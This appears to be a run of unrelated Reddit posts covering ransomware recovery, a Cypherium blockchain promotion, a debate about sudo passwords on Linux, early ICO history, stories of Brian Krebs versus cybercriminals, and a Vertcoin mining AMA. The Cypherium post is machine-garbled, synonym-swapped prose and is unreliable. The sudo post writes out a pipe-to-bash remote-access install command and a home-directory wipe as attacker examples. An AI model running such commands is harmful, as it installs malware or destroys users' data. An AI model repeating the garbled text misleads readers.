Businesses that have improperly configured network security may leave their Remote Desktop Protocol (RDP) ports open. Unknowingly, this is the equivalent of leaving the front door unlocked when you leave your home: it provides an opportunity for cyber attacks to come through with little deterrence.
Once a hacker is connected to your network, they can install ransomware and additional back doors to access your network at a later date. A large percentage of ransomware attacks still use this method of attack because so many organizations are not even aware of this security vulnerability.

Phishing Attacks

Ransomware can infiltrate your network by a malicious email campaign known as a phishing attack. Ransomware operators use massive networks of internet-connected devices (botnets) to send phishing emails to unsuspecting victims. These emails intend to trick the receiver into clicking on a malicious attachment or link, which can secretly install the ransomware virus or other malware.
Phishing emails are becoming increasingly difficult to detect as cybercriminals find clever ways to make a malicious email look legitimate. This underscores the importance of security awareness training for everyone in the organization, not just the I.T. department.

Compromised Passwords

The ransomware operators may have used previously compromised passwords from employees at your organization to gain unauthorized access to the networks. This derives from the poor security practices of reusing the same passwords for multiple accounts and authentication processes.
If your employees have been using old & weak passwords to access your business data, a cyber criminal can use a previously compromised password to initiate the attack. Remember to always to follow good password hygiene.
The variety of attack vectors highlights the importance of a digital forensics investigation that can help victims understand how the ransomware came onto your computer and what steps you can take to remediate the vulnerability.

4 Options for Ransomware Recovery

In this section, we cover the options to restore files encrypted or locked by ransomware.

1. Recover files with a backup

If your files become encrypted in a ransomware attack, check to see if you have backups to restore and recover (in order).

2. Recreate the data

Even though your files are encrypted by ransomware, you might be able to recreate the data from a variety of sources as outlined below:

3. Breaking the ransomware encryption

The harsh truth is that the majority of ransomware encryption is unbreakable. This impossibility is a tough concept for many of us to accept, given the technological advances of our society.
Does this mean you should skip looking into whether the ransomware encryption can be broken? This option should always be explored if presented by a ransomware recovery firm, although the final choice is yours to make. We will lay out a real life example at Proven Data below to outline why this was a great decision for a company that was infected with ransomware.
While it tends to be rare, there are poorly constructed ransomware encryptions that have been broken by security researchers. If you can avoid paying a ransom, you should at all costs.
There can be flaws in the malware or weaknesses in the encryption. Businesses can look at these options, especially if time is on your side. There are also free ransomware decryption resources that provide tools for previously decrypted ransomware variants. A client of ours had hired a ransomware recovery company to recover their files until we discovered at the very last moment through our analysis that the encryption was breakable. With less than 20 minutes to spare, we saved the client out of paying a $450,000 ransom.

Why can’t most ransomware encryption be broken?

Ransomware is a cryptovirus, which means it uses cryptography in combination with malware to lock your files. Modern cryptography uses sophisticated mathematical equations (algorithms) and secret keys to encrypt and decrypt data. If strong encryption is used, it can take thousands, if not millions of years to break the encryption given the strength of today’s computers.
Encryption is a security tool created with the intent of data protection. It is a defensive tool to provide security, privacy, and authentication. Sadly, ransomware attackers are using it as a weapon against innocent victims.

How do I know if the encryption can be broken?

You can start off with this free ransomware identification resource to determine the feasibility of decryption. You will need to upload the ransom note and a sample file into the ID-Ransomware website, and it will tell you if there is a free decrypter or if it is an unknown ransomware variant. Please note that the tool is not always 100% accurate. If the variant is still under analysis, you will need a malware or encryption analyst to determine whether or not there is a possibility for decryption.
Encryption is designed to be unbreakable, which is why security researchers can’t simply make a tool for ransomware decryption. These unbreakable encryptions protect our bank accounts, trade secrets, government data, and mobile communications, among other things. It would be a significant security concern if there were a master decryption tool that could break encryption algorithms.

4. Paying the ransom to decrypt ransomware files

If the encryption is too strong, the only way to obtain the decryption key for your files is to pay the ransom. Many ransomware victims don’t have time on their side because they are facing significant business disruption. Each minute that passes could be a lost client, or worse for a medical organization.
Here is a list of the most prevalent ransomware variants that are known to be “cryptographically secure,” which means that Proven Data or the security community has confirmed the encryption is unbreakable:

I don’t want to pay the hackers ransom.

Businesses and individuals have the option of choosing not to pay the ransom in a ransomware attack to regain access to their files. For personal, political, or moral reasons, there has been resentment of the ransomware economy, and victims do not have to engage in extortion. If paying the ransom is the only option, you should know what to expect before considering moving forward.

How a ransomware recovery specialist can help

If you do decide to use a ransomware recovery company and if there is one thing you get out of this article, it is this: You should always question how a ransomware recovery company is recovering your data. If you are unsure, asking the right questions will ensure a transparent experience:
A ransomware recovery specialist can analyze your current situation and determine what options are available to you at the time of the inquiry. A competent and experienced ransomware recovery company should be able to provide the following:
Understanding how your files were affected by ransomware in the first place will provide you with the insight needed to prevent another attack. Whether you choose Proven Data or another company to decrypt your ransomware files, it’s important to know what unknowns there may be out there.
Our threat intelligence that we’ve gathered from the thousands of previous cases enable you to make informed decisions in helping restore your data after a ransomware attack. If you require a company with such experience, we’re standing by to assist 24/7.
submitted by Proven_Data to u/Proven_Data [link] [comments]

CYPHERIUM ENHACES BLOCKCHAIN TECHNOLOGY

OVERVIEW
Rarely has any technology such as blockchain attracted the public and media organisations. Institutions designed to catalyze the fourth industrial revolution are experimenting with technology, and investors have invested hundreds of millions of dollars in blockchain companies. This is a low-risk, experimental environment with error protection. Innovation is a combination of creativity and implementation. Ideas often must go through an evolutionary or cyclical phase before they are ready for commercialization. In fact, the cycle is so long that it is too expensive, inefficient in terms of time and money to generate and generate ideas, and in most cases almost never reaches commercial value. Thus, almost 99% of venture capital firms fail.
A fast growing technology that has come to enhance the blockchain technology is CYPHERIUM.

CHALLENGES FACING THE BLOCKCHAIN TECHNOLOGY
The Bitcoin framework is one of the most notable usage of blockchain innovations in circulated exchange based frameworks. In Bitcoin, each system hub seeks the benefit of putting away a lot of at least one exchanges in another square of the blockchain by comprehending a complex computational math issue, here and there alluded to as a mining verification of-work (POW). Under current conditions, a lot of exchanges is ordinarily put away in another square of the Bitcoin blockchain at a pace of around one new square like clockwork, and each square has an inexact size of one megabyte (MB). As needs be, the Bitcoin framework is dependent upon a looming versatility issue: as it were 3 to 7 exchanges can be handled every second, which is far underneath the quantity of exchanges handled in other exchange based frameworks, for example, the roughly 30,000 exchanges for each second in the Visa™ exchange framework. The most huge disadvantage of the Nakamoto accord is its absence of irrevocability. Conclusion implies once an exchange or an activity is performed on the blockchain, it is for all time recorded on the blockchain and difficult to turn around. This is fundamental to the wellbeing of money related repayment frameworks as exchanges must not be saved once they are made. For Bitcoin's situation, noxious on-screen characters can alter the exchange history given enough hash power, causing a twofold spending assault, given that there is sufficient motivator and money related practicality to complete such assaults. Given that mining gear leasing and botnets are at present predominant around the world, such an assault has become achievable.
Because of this absence of conclusiveness, Nakamoto accord must depend on additional measures, for example, confirmation of-work to forestall pernicious exercises. This hinders the capacity ofNakamoto accord to scale in light of the fact that a exchange must hang tight for various affirmations before coming to "probabilistic absolution".
In this way, wellbeing isn't ensured by Nakamoto agreement, and so as to secure the system, each exchange must experience extra an ideal opportunity to process. For Bitcoin's situation, an exchange isn't considered last until in any event six affirmations. Since Bitcoin can just process a couple of exchanges every second, the exchange cost is preposterously high, making it unreasonable for little installments like shopping for food or eatery feasting. This extraordinarily frustrates Bitcoin's utilization as an installment strategy in this present reality.

CYPHERIUM SOLUTIONS
Cypherium's exclusive algorithm, CypherBFT conquers burdens of the earlier craftsmanship by giving a circulated exchange framework including a gathering of validator hubs that are known to each other in a system however are undefined to the next system hubs in the system. As utilized thus, the gathering of validator hubs might be alluded to as a "Board of trustees" of validator hubs. In a few explanations, the framework reconfigures at least one validator hubs in the Committee dependent on the consequences of confirmation of-work (POW) challenges. As per some uncovered epitomes, a system hub that isn't as of now a validator hub in the Committee might be added to the Committee on the off chance that it effectively finishes a POW challenge. In such an occasion, the system hub may turn into another validator hub in the Committee, supplanting a current validator hub. In elective epitomes, a system hub may become another validator hub in the Committee dependent on a proof-of-stake (POS) accord. In yet another epitome, a system hub may turn into another validator hub in the Committee dependent on a verification of-authority (POA) agreement. In other elective exemplifications, a system hub may turn into a new validator hub in the Committee dependent on a mix of any of POW, POA, and POS accord.

In some revealed exemplifications, the new validator hub replaces a validator hub in the Committee. The substitution might be founded on a foreordained guideline known by all the hubs in the system. For model, the new validator hub may supplant the most established validator hub in the Committee. As indicated by another model, the new validator hub may supplant a validator hub that has been resolved to have gone disconnected, become bargained (e.g., hacked), fizzled (e.g., because of equipment breakdown), or in any case is inaccessible or not, at this point trusted. In the praiseworthy exemplifications, the circulated framework expect that for an adaptation to non-critical failure of f hubs, the Committee incorporates at any rate 3f +1 validator hubs.
Since the validator hubs in the Committee might be every now and again supplanted, for instance, contingent upon the measure of time required to finish the POW challenges, it is hard for vindictive outsiders to identify the total arrangement of validator hubs in the Committee at some random time.

BENEFITS OF CYPHERIUM BLOCKCHAIN TECHNOLOGY
Cypherium runs its exclusive CypherBFT accord, tied down by the HotStuff calculation, and can genuinely offer moment irrevocability for its system clients. With its HotStuff-based structure, the CypherBFT's runtime keeps going just 20-30 milliseconds (ms). A few affirmations are all that is required to for all time acknowledge a proposed obstruct into the blockchain, and it just takes 90ms for these affirmations to come to pass, making the procedure essentially quicker than the two-minutes required by EOS.
Cypherium's CypherBFT, which additionally uses HotStuff, doesn't have to pick between responsiveness and linearity. Cypherium's double blockchain structure incorporates the velocities of a dag, however its review for clients can occur a lot more straightforward and quicker, which adds to the accessibility of data and makes the data more decentralized.
As per some revealed epitomes, the validator hubs in the Committee may get exchange demands from other system hubs, for instance, in a P2P organize. The Committee may incorporate at any rate one validator hub that fills in as a "Pioneer" validator hub; the other validator hubs might be alluded to as "Partner" validator hubs. The Leader hub might be changed occasionally, on request, or inconsistently by the individuals from the Committee. At the point when any validator hub gets another exchange demand from a non-validator hub in the system, the exchange solicitation might be sent to the entirety of the validator hubs in the Committee. Further to the unveiled epitomes, the Pioneer hub facilitates with the other Associate validator hubs to arrive at an accord of an attitude (e.g., acknowledge or dismiss) for an exchange square containing the exchange solicitation and communicates the accord to the whole P2P arrange. In the event that the accord is to acknowledge or in any case approve the exchange demand, the mentioned exchange might be included another square of a blockchain that is known to in any event a portion of the system hubs in the system.
In conclusion, CYPHERIUM'S distributed smart-contracts block-chain is ideal for a good number of use cases which include (but not limited to):
Finance
Messaging
Voting
Notarization
Digital Agreements (Contracts)
Secure data storage
A.I (Artificial Intelligence)
IoT (Internet of Things
To know more about CYPHERIUM kindly visit the following links:
WEBSITE: https://cypherium.io/
GITHUB: https://github.com/cypherium
WHITEPAPER: https://github.com/cypherium/patent/blob/maste15224.0003%20-%20FINAL%20Draft%20Application%20(originally%200003%20invention%201)%20single%20chain%20in%20pipeline.pdf
TELEGRAM: https://t.me/cypherium_supergroup
TWITTER: http://twitter.com/cypheriumchain
FACEBOOK: https://www.facebook.com/CypheriumChain/
AUTHOR: Nwali Jennifer
submitted by iphygurl to BlockchainStartups [link] [comments]

CMV: Requiring a password for "sudo" access on desktop Linux systems is nothing but security theater.

Furthermore: on desktop systems it is perfectly fine to put NOPASSWD:ALL in your /etc/sudoers and similar in /etc/polkit-1/rules.d. In fact, I think this should be the default so users do not get a false sense of security.
For clarity, I'm not saying that all accounts should have sudo access, just saying that there's no meaningful security distinction between "sudo access with password" and "sudo access without password", and the "with password" path does nothing but wasting the user's time and giving them a false sense of security.
Argument #1: compromising a user account effectively compromises everything you care about.
As the relevant XKCD says, if your user account is compromised, the attacker cal already do everything he probably cares about. This includes:
Yes, you can run a remote access tool without root. Starting programs at boot does not require root (see systemctl --user, .bashrc, crontab -e, whatever). Internet access does not require root (see: your browser). I frequently see users thinking that remote access kits require root for some reason. Thanks to the X protocol, keylogging does not require root access either on most systems.
The uses for root-level access I can think of is (1) to infect other users of the system, and (2) to install a rootkit infecting your firmware to survive OS reinstallation. The alleged other users do most likely not exist on desktop systems, and only advanced viruses would put rootkits in firmware—viruses with that level of sophistication may as well use the following point to gain root access after compromising an user account.
Argument #2: compromising access to a user account with sudo access effectively compromises root, and a password check won't stop that.
If your account is in the sudoers file, actively used, and an attacker compromises your account, there are a bazillion ways to get access to root. Here are some examples:
Since Linux has made it effectively impossible to use a system without occasional root usage, you will elevate yourself to root at some point, and at that point the attacker will be able to steal said root access one way or another.
Often-heard counterargument: "If you allow sudo without password and leave your computer unattended without locking it, then some passerby may be able to sudo something, but if sudo required a password, he wouldn't have the time to do one of the advanced techniques above."
Reply: targeted attacks can "curl URL_OF_REMOTE_ACCESS_KIT_INSTALLATION_SCRIPT | bash". Random passerby trolls can ruin your day with "rm -rf ~". Both can be typed fairly quickly and neither requires root-level access.
Although I do consider myself a security-focused person, entering my password upon every sudo is still something I consider a waste of keystrokes and a source of security myths. Since the majority of the Linux world seems to disagree with me, I would like to know whether there's something major I'm overlooking.
submitted by ArchaicArchivist to changemyview [link] [comments]

Writing a short early history of ICOs, starting with altcoins - anything important I've missed?

This is for the forever-forthcoming ICO book. But I figured I needed to talk about altcoins first, the previous generation of shitcoins. This is mostly from dredging early altcoin stuff on Bitcointalk.
There needs to be a bit of the end that leads from The DAO as a world-famous ICO to the 2017 crypto bubble, and ICOs booming in that. Is there anything super-relevant I've missed? In the context of ICOs as we now know them, not just altcoins. Ethereum and Ripple probably.
The early history of ICOs
In the beginning was Bitcoin.
That’s the start for every cryptocurrency and blockchain story. Different parts are important to different people — fun and interesting technology, decentralised money, fighting the oppressive statist jackboots of taxation, sticking it to the man.
What ICOs inherit from Bitcoin is the notion of inventing your own magical Internet money — so you can get rich for free. Bitcoin was released in January 2009 as an open protocol, implemented as open source code — anyone could take a copy of it, twiddle it a bit and have a new coin. It took until April 2011 for the first “fork” of the Bitcoin code to come out — Namecoin, an attempt at a decentralised replacement for the Internet’s Domain Name Service (DNS).[1]
It was another four months until someone came up with a general altcoin, usable as a Bitcoin-style payment system — Ixcoin, on 10 August 2011.[2] The creator, “Thomas Nasakioto” — an anagram of "Satoshi Nakamoto"; he used a picture of Japanese actor Hiroyuki Sanada as his forum avatar — disappeared less than a month later, having scored about 50 bitcoins in the process. “Pretty sure it’s dead,” said one commenter. “It has served his purpose. Many people made quite a few BTC out of it.”[3]
A flood of what were rapidly labeled “altcoins” followed — i0coin, Solidcoin, RRCoin, Tenebrix, Litecoin. The Freenode Internet Relay Chat network started banning cryptocurrency servers that made automated network announcements around this time, rather than deal with what looked “like a botnet using their network.”[4]
The first Initial Coin Offering as we know it is commonly held to be Mastercoin in July 2013.[5] Mastercoin became OmniLayer — the platform for Tether. Mastercoin was the first sale of a token that ran as an application on top of another blockchain — in this case, Bitcoin: “I am VERY excited to announce that I now have a complete specification for building a protocol layer on top of bitcoin (like how HTTP runs on top of TCP/IP).”
Mastercoin didn’t use the phrase “Initial Coin Offering.” The phrase “IPO” — “Initial Public Offering,” in the manner of stock offerings for companies going public — was being used for altcoin offerings by 2014. IronBankCoin used “initial coin offering” and “ICO” by July 2014 — “The initial coin offering will be of 21% of the coin cap during the PoW (Proof of Work) stage” and “Initial Distribution of the Land (ICO info): ICO? Aren't those all scams?”[6]
Mastercoin never really took off as a token platform — that didn’t come until Ethereum made tokens easy to set up in 2015, and The DAO got press worldwide in 2016 by showing just how much money an ICO could pull in. Even as The DAO proceeded to lose $50 million to a hacker five days after launch.
  1. vinced. “(announce) Namecoin - a distributed naming system based on Bitcoin.” BitcoinTalk Bitcoin Forum > Bitcoin > Bitcoin Discussion, 18 April 2011.
  2. Nasakioto. “[ANNOUNCE] Mining on Ixcoin, a new Bitcoin fork.” Ixcoin Forum, 10 August 2011. (archive)
  3. Mindphlux. “Re: What happened to the ixcoin founder? Is Ixcoin dead?” BitcoinTalk Bitcoin Forum > Other > Alternate cryptocurrencies, 9 September 2011.
  4. DannyM. “Ixcoin, I0coin, future forks: Please respect Freenode Network.” BitcoinTalk Bitcoin Forum > Other > Alternate cryptocurrencies, 16 August 2011
  5. Dacoinminster. “OFFICIAL LAUNCH: New Protocol Layer Starting FromNew Protocol Layer Starting From ‘The Exodus Address’.” BitcoinTalk Bitcoin Forum > Bitcoin > Project Development, 31 July 2013.
  6. IronBankCoin. “(Pre-ANN)(IBC) IronBankCoin | 90-day PoW~PoS | Own part of the Known World.” BitcoinTalk Bitcoin Forum > Alternate cryptocurrencies > Announcements (Altcoins), 17 June 2014, updated 28 July 2014.
submitted by dgerard to Buttcoin [link] [comments]

A few stories about Brian Krebs: The independent cybercrime journalist who exposes criminals on the internet

First, a bit of introduction before we get into the living drama that is Brian Krebs.
Brian Krebs has been a journalist for decades, starting in the late 90s. He got his start at The Washington Post, but what he's most famous for are his exposes on criminal businesses and individuals who perpetuate cyber crime worldwide. In 2001, he got his interest in cybercrime piqued when a computer worm locked him out of his own computer. In 2005, he shifted from working as a staff writer at The Washington Post's tech newswire to writing for their security blog, "Security Wire". During his tenure there, he started by focusing on the victims of cybercrime, but later also started to focus on the perpetrators of it as well. His reporting helped lead to the shutdown of McColo, a hosting provider who provided service to some of the world's biggest spammers and hackers. Reports analyzing the shutdown of McColo estimated that global spam volume dropped by between 40 and 70 percent. Further analysis revealed it also played host to child pornography sites, and the Russian Business Network, a major Russian cybercrime ring.
In 2009, Krebs left to start his own site, KrebsOnSecurity. Since then, he's been credited with being the first to report on major events such as Stuxnet and when Target was breached, resulting in the leakage of 40 million cards. He also regularly investigates and reveals criminals' identities on his site. The latter has made him the bane of the world of cybercrime, as well as basically a meme, where criminals will include references like Made by Brian Krebs in their code, or name their shops full of stolen credit cards after him.
One of his first posts on his new site was a selection of his best work. While not particularly dramatic, they serve as an excellent example of dogged investigative work, and his series reveal the trail of takedowns his work has documented, or even contributed to.
And now, a selection of drama involving Krebs. Note, all posts are sarcastically-tinged retellings of the source material which I will link throughout. I also didn't use the real names in my retellings, but they are in the source material. This took way too long to write, and it still does massively condense the events described in the series. Krebs has been involved with feuds with other figures, but I'd argue these tales are the "main" bits of drama that are most suited for here.

Fly on the Wall

By 2013, Krebs was no stranger to cybercriminals taking the fight to the real world. He was swatted previously to the point where the police actually know to give him a ring and see if there'd actually been a murder, or if it was just those wacky hackers at it again. In addition, his identity was basically common knowledge to cybercriminals, who would open lines of credit in his name, or find ways to send him money using stolen credit cards.
However, one particular campaign against him caught his eye. A hacker known as "Fly" aka "Flycracker" aka "MUXACC1" posted on a Russian-language fraud forum he administered about a "Krebs fund". His plan was simple. Raise Bitcoin to buy Heroin off of a darknet marketplace, address it to Krebs, and alert his local police via a spoofed phone call. Now, because Krebs is an investigative journalist, he develops undercover presences on cybercrime forums, and it just so happened he'd built up a presence on this one already.
Guys, it became known recently that Brian Krebs is a heroin addict and he desperately needs the smack, so we have started the "Helping Brian Fund", and shortly we will create a bitcoin wallet called "Drugs for Krebs" which we will use to buy him the purest heroin on the Silk Road. My friends, his withdrawal is very bad, let’s join forces to help the guy! We will save Brian from the acute heroin withdrawal and the world will get slightly better!
Fly had first caught Krebs' attention by taunting him on Twitter, sending him Tweets including insults and abuse, and totally-legit looking links. Probably either laced with malware, or designed to get Krebs' IP. He also took to posting personal details such as Krebs' credit report, directions to his house, and pictures of his front door on LiveJournal, of all places.
So, after spotting the scheme, he alerted his local police that he'd probably have someone sending him some China White. Sure enough, the ne'er-do-wells managed to raise 2 BTC, which at the time was a cool $200 or so. They created an account on the premiere darknet site at the time, The Silk Road under the foolproof name "briankrebs7". They found one seller who had consistently high reviews, but the deal fell through for unknown reasons. My personal theory is the seller decided to Google where it was going, and realized sending a gram of dope into the waiting arms of local law enforcement probably wasn't the best use of his time. Still, the forum members persevered, and found another seller who was running a buy 10 get 2 free promotion. $165 of Bitcoin later, the drugs were on their way to a new home. The seller apparently informed Fly that the shipment should arrive by Tuesday, a fact which he gleefully shared with the forum.
While our intrepid hero had no doubt that the forum members were determined to help him grab the tail of the dragon, he's not one to assume without confirmation, and enlisted the help of a graduate student at UCSD who was researching Bitcoin and anonymity on The Silk Road, and confirmed the address shared by Fly was used to deposit 2 BTC into an account known to be used for money management on the site.
By Monday, an envelope from Chicago had arrived, containing a copy of Chicago confidential. Taped inside were tiny baggies filled with the purported heroin. Either dedicated to satisfied customers, or mathematically challenged, the seller had included thirteen baggies instead of the twelve advertised. A police officer arrived to take a report and whisked the baggies away.
Now, Fly was upset that Krebs wasn't in handcuffs for drug possession, and decided to follow up his stunt by sending Krebs a floral arrangement shaped like a cross, and an accompanying threatening message addressed to his wife, the dire tone slightly undercut by the fact that it was signed "Velvet Crabs". Krebs' curiosity was already piqued from the shenanigans with the heroin, but with the arrival of the flowers decided to dive deeper into the сука behind things.
He began digging into databases from carding sites that had been hacked, but got his first major breakthrough to his identity from a Russian computer forensics firm. Fly had maintained an account on a now-defunct hacking forum, whose database was breached under "Flycracker". It turns out, the email Flycracker had used was also hacked at some point, and a source told Krebs that the email was full of reports from a keylogger Fly had installed on his wife's computer. Now, because presumably his wife wasn't part of, or perhaps even privy to her husband's illicit dealings, her email account happened to be her full legal name, which Krebs was able to trace to her husband. Now, around this time, the site Fly maintained disappeared from the web, and administrators on another major fraud forum started purging his account. This is a step they typically take when they suspect a member has been apprehended by authorities. Nobody knew for sure, but they didn't want to take any chances.
More research by Krebs revealed that the criminals' intuition had been correct, and Fly was arrested in Italy, carrying documents under an assumed name. He was sitting in an Italian jail, awaiting potential extradition to the United States, as well as potentially facing charges in Italy. This was relayed to Krebs by a law enforcement official who simply said "The Fly has been swatted". (Presumably while slowly removing a pair of aviator sunglasses)
While Fly may have been put away, the story between Krebs and Fly wasn't quite over. He did end up being extradited to the US for prosecution, but while imprisoned in Italy, Fly actually started sending Krebs letters. Understandably distrustful after the whole "heroin" thing, his contacts in federal law enforcement tested the letter, and found it to be clean. Inside, there was a heartfelt and personal letter, apologizing for fucking with Krebs in so many ways. He also forgave Krebs for posting his identity online, leading him to muse that perhaps Fly was working through a twelve-step program. In December, he received another letter, this time a simple postcard with a cheerful message wishing him a Merry Christmas and a Happy New Year. Krebs concluded his post thusly:
Cybercrooks have done some pretty crazy stuff to me in response to my reporting about them. But I don’t normally get this kind of closure. I look forward to meeting with Fly in person one day soon now that he will be just a short train ride away. And he may be here for some time: If convicted on all charges, Fly faces up to 30 years in U.S. federal prison.
Fly ultimately was extradited. He plead guilty and was sentenced to 41 months in jail

vDOS and Mirai Break The Internet

Criminals are none too happy when they find their businesses and identities on the front page of KrebsOnSecurity. It usually means law enforcement isn't far behind. One such business was known as vDOS. A DDOS-for-hire (also known as a "booter" or a "stresser") site that found itself hacked, with all their customer records still in their databases leaked. Analysis of the records found that in a four-month time span, the service had been responsible for about 8.81 years worth of attack time, meaning on average at any given second, there were 26 simultaneous attacks running. Interestingly, the hack of vDOS came about from another DDOS-for-hire site, who as it turns out was simply reselling services provided by vDOS. They were far from the only one. vDOS appeared to provide firepower to a large number of different resellers.
In addition to the attack logs, support messages were also among the data stolen. This contained some complaints from various clients who complained they were unable to launch attacks against Israeli IPs. This is a common tactic by hackers to try and avoid unwanted attention from authorities in their country of residence. This was confirmed when two men from Israel were arrested for their involvement in owning and running vDOS. However, this was just the beginning for this bit of drama.
The two men arrested went by the handles "applej4ck" and "Raziel". They had recently published a paper on DDOS attack methods in an online Israeli security magazine. Interestingly, on the same day the men were arrested, questioned, and released on bail, vDOS went offline. Not because it had been taken down by Israeli authorities, not because they had shut it down themselves, but because a DDOS protection firm, BackConnect Security, had hijacked the IP addresses belonging to the company. To spare a lot of technical detail, it's called a BGP hijack, and it basically works by a company saying "Yeah, those are our addresses." It's kind of amazing how much of the internet is basically just secured by the digital equivalent of pinky swears. You can read some more technical detail on Wikipedia. Anyway, we'll get back to BackConnect.
Following the publication of the story uncovering the inner workings of vDOS, KrebsOnSecurity was hit with a record breaking DDOS attack, that peaked at 620/Gbps, nearly double the most powerful DDOS attack previously on record. To put that in perspective, that's enough bandwidth to download 5 simultaneous copies of Interstellar in 4K resolution every single second, and still have room to spare. The attack was so devastating, Akamai, one of the largest providers of DDOS protection in the world had to drop Krebs as a pro bono client. Luckily, Google was willing to step in and place his site under the protection of Google's Project Shield, a free service designed to protect the news sites and journalists from being knocked offline by DDOS attacks.
This attack was apparently in retaliation for the vDOS story, since some of the data sent in the attack included the string "freeapplej4ck". The attack was executed by a botnet of Internet of Things (or IoT) devices. These are those "smart" devices like camera systems, routers, DVRs. Basically things that connect to the cloud. An astounding amount of those are secured with default passwords that can be easily looked up from various sites or even the manufacturers' websites. This was the start of a discovery of a massive botnet that had been growing for years.
Now time for a couple quick side stories:
Dyn, a company who provides DNS to many major companies including Twitter, Reddit, and others came under attack, leaving many sites (including Twitter and Reddit) faltering in the wake of it. Potentially due to one of their engineers' collaboration with Krebs on another story. It turned out that the same botnet that attacked Krebs' site was at least part of the attack on Dyn
And back to BackConnect, that DDOS protection firm that hijacked the IP addresses from vDOS. Well it turns out BGP Hijacks are old hat for the company. They had done it at least 17 times before. Including at least once (purportedly with permission) for the address 1.3.3.7. Aka, "leet". It turns out one of the co-founders of BackConnect actually posted screenshots of him visiting sites that tell you your public IP address in a DDOS mitigation industry chat, showing it as 1.3.3.7. They also used a BGP Hijack against a hosting company and tried to frame a rival DDOS mitigation provider.
Finally, another provider, Datawagon was interestingly implicated in hosting DDOS-for-hire sites while offering DDOS protection. In a Skype conversation where the founder of Datawagon wanted to talk about that time he registered dominos.pizza and got sued for it, he brings up scanning the internet for vulnerable routers completely unprompted. Following the publication of the story about BackConnect, in which he was included in, he was incensed about his portrayal, and argued with Krebs over Skype before Krebs ultimately ended up blocking him. He was subsequently flooded with fake contact requests from bogus or hacked Skype accounts. Shortly thereafter, the record-breaking DDOS attack rained down upon his site.
Back to the main tale!
So, it turns out the botnet of IoT devices was puppeteered by a malware called Mirai. How did it get its name? Well, that's the name its creator gave it, after an anime called Mirai Nikki. How did this name come to light? The creator posted the source code online. (The name part, not the origin. The origin didn't come 'til later.) The post purported that they'd picked it up from somewhere in their travels as a DDOS industry professional. It turns out this is a semi-common tactic when miscreants fear that law enforcement might come looking for them, and having the only copy of the source code of a malware in existence is a pretty strong indicator that you have something to do with it. So, releasing the source to the world gives a veneer of plausible deniability should that eventuality come to pass. So who was this mysterious benefactor of malware source? They went by the name "Anna-senpai".
As research on the Mirai botnet grew, and more malware authors incorporated parts of Mirai's source code into their own attacks, attention on the botnet increased, and on the people behind it. The attention was presumably the reason why Hackforums, the forum where the source code was posted, later disallowed ostensible "Server Stress Tester" services from being sold on it. By December, "Operation Tarpit" had wrought 34 arrests and over a hundred "knock and talk" interviews questioning people about their involvement.
By January, things started to come crashing down. Krebs published an extensive exposé on Anna-senpai detailing all the evidence linking them to the creation of Mirai. The post was so big, he included a damn glossary. What sparked the largest botnet the internet had ever seen? Minecraft. Minecraft servers are big business. A popular one can earn tens of thousands of dollars per month from people buying powers, building space, or other things. It's also a fiercely competitive business, with hundreds of servers vying for players. It turns out that things may have started, as with another set of companies, two rival DDOS mitigation providers competing for customers. ProTraf was a provider of such mitigation technology, and a company whose owner later worked for ProTraf had on at least one occasion hijacked addresses belonging to another company, ProxyPipe. ProxyPipe had also been hit with DDOS attacks they suspected to be launched by ProTraf.
While looking into the President of ProTraf, Krebs realized he'd seen the relatively uncommon combination of programming languages and skills posted by the President somewhere else. They were shared by Anna-senpai on Hackforums. As Krebs dug deeper and deeper into Anna-senpai's online presence, he uncovered other usernames, including one he traced to some Minecraft forums where a photoshopped picture of a still from Pulp Fiction contained the faces of BackConnect, which was a rival to ProTraf's DDOS mitigation business, and another face. A hacker by the name of Vyp0r, who another employee of ProTraf claimed betrayed his trust and blackmailed him into posting the source of another piece of malware called Bashlite. There was also a third character photoshopped into the image. An anime character named "Yamada" from a movie called B Gata H Hei.
Interestingly, under the same username, Krebs found a "MyAnimeList" profile which, out of 9 titles it had marked as watched, were B Gata H Hei, as well as Mirai Nikki, the show from which Mirai derived its name. It continues on with other evidence, including DDOS attacks against Rutgers University, but in short, there was little doubt in the identity of "Anna-senpai", but the person behind the identity did contact Krebs to comment. He denied any involvement in Mirai or DDOS attacks.
"I don’t think there are enough facts to definitively point the finger at me," [Anna-senpai] said. "Besides this article, I was pretty much a nobody. No history of doing this kind of stuff, nothing that points to any kind of sociopathic behavior. Which is what the author is, a sociopath."
He did, however, correct Krebs on the name of B Gata H Kei.
Epilogue
Needless to say, the Mirai botnet crew was caught, but managed to avoid jailtime thanks to their cooperation with the government. That's not to say they went unpunished. Anna-senpai was sentenced to 6 months confinement, 2500 hours of community service, and they may have to pay up to $8.6 million in restitution for their attacks on Rutgers university.

Other Stories

I don't have the time or energy to write another effortpost, and as is I'm over 20,000 characters, so here's a few other tidbits of Krebs' clashes with miscreants.
submitted by HereComesMyDingDong to internetdrama [link] [comments]

Vertcoin Mining AMA

What is Vertcoin?

Vertcoin was created in 2014. It is a direct hedge against long term mining consensus centralization on the Bitcoin mining network. Vertcoin achieves its mining consensus solely through Graphics Cards as they are the most abundant / widely available consensus devices that produce a reasonable amount of hashrate. This is done using a mining algorithm that deliberately geared against devices like ASICs, FPGAs and CPUs (due to botnets) making them extremely inefficient. Consensus distribution over time is the most important aspect of a blockchain and should not be taken lightly. It is critical that you understand what blockchain specifications mean/do to fully understand Vertcoin.

Mining Vertcoin

When users of our network send each other Vertcoin, their transactions are secured by a process called mining. Miners will compose a so-called block out of the pending transactions, and need to perform a large number of computations called hashes in order to produce the Proof-of-Work. With this Proof-of-Work, the block is accepted by the network and the transactions in it become confirmed.
Mining is essentially a race. Whoever finds a valid Proof-of-Work and gets the block propagated over more than half of the Vertcoin network first, wins this race and is allowed to reward themselves with the block reward. The block reward is how new Vertcoin come in circulation. This block reward started at 50 VTC when Vertcoin was launched, and halves every four years. The current block reward is 25 VTC.
Vertcoin's One Click Miner: https://github.com/vertcoin-project/One-Click-Minereleases
Learn more about mining here: https://vertcoin.org/mine/
Specification List:
· Launch date: Jan 11, 2014
· Proof-Of-Work (Consensus Mechanism)
· Total Supply: 84,000,000 Vertcoin
· Preferred Consensus Device: GPU
· Mining Algorithm: Lyra2REv3 (Made by Vertcoin)
· Blocktime: 2.5 minutes
· SegWit: Activated
· Difficulty Adjustment Algorithm: Kimoto Gravity Well (Every Block)
· Block Halving: 4 year interval
· Initial Block Reward: 50 coins
· Current Block Reward: 25 coin
More spec information can be found here: https://vertcoin.org/specs-explained/

Why Does Vertcoin Use GPUs Then?

ASIC’s (Manufactuer Monopoly)
